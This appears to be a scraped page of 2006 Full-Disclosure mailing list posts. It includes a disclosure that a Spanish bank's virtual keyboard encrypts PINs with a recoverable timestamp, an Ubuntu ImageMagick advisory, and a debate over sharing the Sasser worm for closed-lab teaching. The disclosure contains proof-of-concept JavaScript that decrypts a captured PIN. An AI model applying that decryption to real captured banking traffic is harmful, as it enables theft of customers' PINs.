-Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED] Sent: Monday, November 27, 2006 2:35 PM To: Debasis Mohanty Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd) On Mon, 27 Nov 2006, Debasis Mohanty wrote: More than a year Old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.htm l http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip http://xforce.iss.net/xforce/xfdb/21727 - I hear buffer overflows were invented quite a few years back, too. :) - That makes most new bof's irrelevant! - Gadi. Nah !! They have just became so common to hear or read ;) Bty - The last post was not meant to get into somekind of argument but to point out a different method to defeat such mechanism. Regards, -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Sunday, November 26, 2006 12:18 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd) Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec. This is about breaking virtual keyboards implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was a reference by which we found the banks' site as one using a virtual keyboard. http://blogs.securiteam.com/index.php/archives/678 http://hispasec.com/laboratorio/cajamurcia_en.htm Gadi. Quoting: Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user's PIN number, fairly easily, and wondered why are they taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted. Image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. Thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the PIN number in cleartext, while others encrypt them, one such example is cajamurcia. Even when the encryption is used, banks tend to implement it badly making it easy to recover the PIN number from the encrypted form. I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you - this already posses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number). PoC: A request to the server would look like: OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01 We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code: https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js function hexToString (h) { var r = ; for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r += String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula = '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2'); var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, ); console.debug(cleartext); We will get our original PIN number. This isn't necessarily easier as it requires data capture, which isn't always easy, but screen captures usually require either an OCR, or manual labor, which the above
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, Peter Dawson wrote: I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- some do. schools partnered with, or using the curriculum of the Center for System Security and Information Assurance (www.cssia.org) come to mind. i'm sure there are others. Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-386-1] ImageMagick vulnerability
=== Ubuntu Security Notice USN-386-1 November 28, 2006 imagemagick vulnerability CVE-2006-5868 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libmagick6 6:6.2.3.4-1ubuntu1.5 Ubuntu 6.06 LTS: libmagick9 6:6.2.4.5-0.6ubuntu0.4 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5.diff.gz Size/MD5: 144276 f71b4df055bac9231c6d4794256d5732 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5.dsc Size/MD5: 899 0d1a0c35f2564b75e27af6a0a757f4c5 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4.orig.tar.gz Size/MD5: 5769194 7e9a3edd467a400a74126eb4a18e31ef amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1334044 f1442ba90c54cfdd1dd0266828407376 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 259516 52c4772274427c11fe93dbc2ddb7445a http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 171564 65bdac06e239398ee62f9ca67ce67e81 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1671240 27f858940a212d836d37f197e1d558a7 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1320974 c92c95369bd473aacb1741aa986df746 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 169642 7a89a61459b01be5af738d7694b6977c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1333074 ea2b1d5399c1a419ed9267f3ac8ec3e4 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 236018 c3b15c5532ce75a066bd7acb21053d42 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 170892 9bb90b14ddfe5b083402b55220523ae7 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1522170 254d36fb51155e07a65cf50f601fb90e http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1224904 55afca2d998171a389b0f485660361ab http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 164948 c366d85731e2bfe7e7d7d89586c094f6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1338026 a2df1ca024545fe1063712634f2fe411 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 260500 65b4ac7834603aef286b67c2bb3909e1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 164128 e5994c1f4c2820c2ce1fbb181cc608da http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1874614 5e3a953a21b30afd852e0e3d4f847329 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1258432 3e299d98ae6b102fa55f4f2879a7 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 164090 419ffc1569e88008d0ce592d84fd09f0 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_sparc.deb Size/MD5: 1333274 89495b2b8d2a0ccda003983c7aa4f6db http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_sparc.deb Size/MD5:
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware? it seemed to me that you were arguing a reason for not distributing the binary was the guy is (not) clued enough to run a 'closed lab' without screwing up... making this a 'we shouldn't support this because we do not know this person is responsible' approach. so the context of my statement relates to consistency of accountability. do *you* know where to find a copy? Yes. did you always? Yes. i'm sorry, but i have a hard time believing this. have you always been able to configure a network to talk via EIGRP? No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist. and once it did there was a point in time in which you learned. you learned because you had access to information. somone else provided this information. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Did I say I was one of the lot of people? Did you notice that I was replying *in the context of KF's comments* saying It's cool because it's in a closed lab? i must've missed that part. i jumped into this because i was once a student at university who benefited from this type of 'closed lab learning environment.' you are absolutely correct that something could go wrong, but fear of failure ought not keep one from trying. i'm reminded of Roosevelt's saying: It is not the critic who counts: not the man who points out how the strong man stumbles or where the doer of deeds could have done better. The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood, who strives valiantly, who errs and comes up short again and again, because there is no effort without error or shortcoming, but who knows the great enthusiasms, the great devotions, who spends himself for a worthy cause; who, at the best, knows, in the end, the triumph of high achievement, and who, at the worst, if he fails, at least he fails while daring greatly, so that his place shall never be with those cold and timid souls who knew neither victory nor defeat. cheers, Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FWD: RE: [Dailydave] Symantec Blackberry Whitepaper. (fwd)
-- Forwarded message -- Date: Mon, 27 Nov 2006 22:01:16 -0600 (CST) From: J.A. Terranson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: RE: [Dailydave] Symantec Blackberry Whitepaper. Someone was kind enough to send it to me, so I am returning the favor for those who may still be looking for it: http://www.mfn.org/~measl/blackberry.security.pdf Enjoy! -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Surely the larger lesson learned from that day is that other men, all over the world, took inspiration not from the heroism of the rescuers in New York or the passengers flying over Pennsylvania, but from the 19 hijackers - the twisted brilliance of their scheme and their willingness to sacrifice their lives to make a political and, as they saw it, religious statement. Richard Corliss/Time Magazine 11 Aug 2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Yeah, old computers at schools are often given away for recycling. On Mon, Nov 27, 2006 at 10:42:14PM -0500, Matthew Flaschen wrote: What budget? Every school that would have a networking class also has obsolete computers. Take a dozen, reformat them, put on an unpatched version of Windows, pull out or disable wifi, and connect them all to a switch (also probably available second-hand). Ensure neither computers nor switch are connected to any other network. Sure, you have to be sure not to f* it up, but it doesn't cost anything. Set-up sasser on one by moving it off a CD-R. Wait. :) This should cost little or nothing. Matt Flaschen Peter Dawson wrote: I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ | .__ .___ .___| | | |__ __| _/__| _/___ | |_/ ___\| | \_/ __ \ / __ |/ __ |/ __ \_ __ \| |\ \___| Y \ ___// /_/ / /_/ \ ___/| | \/| | \___ ___| /\___ \ |\___ __| | |\/ \/ \/ \/\/\/| | | |http://chedder.hacked.in | | cheesebox.terroristorganization.info | |___| You don't exist. Go away ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/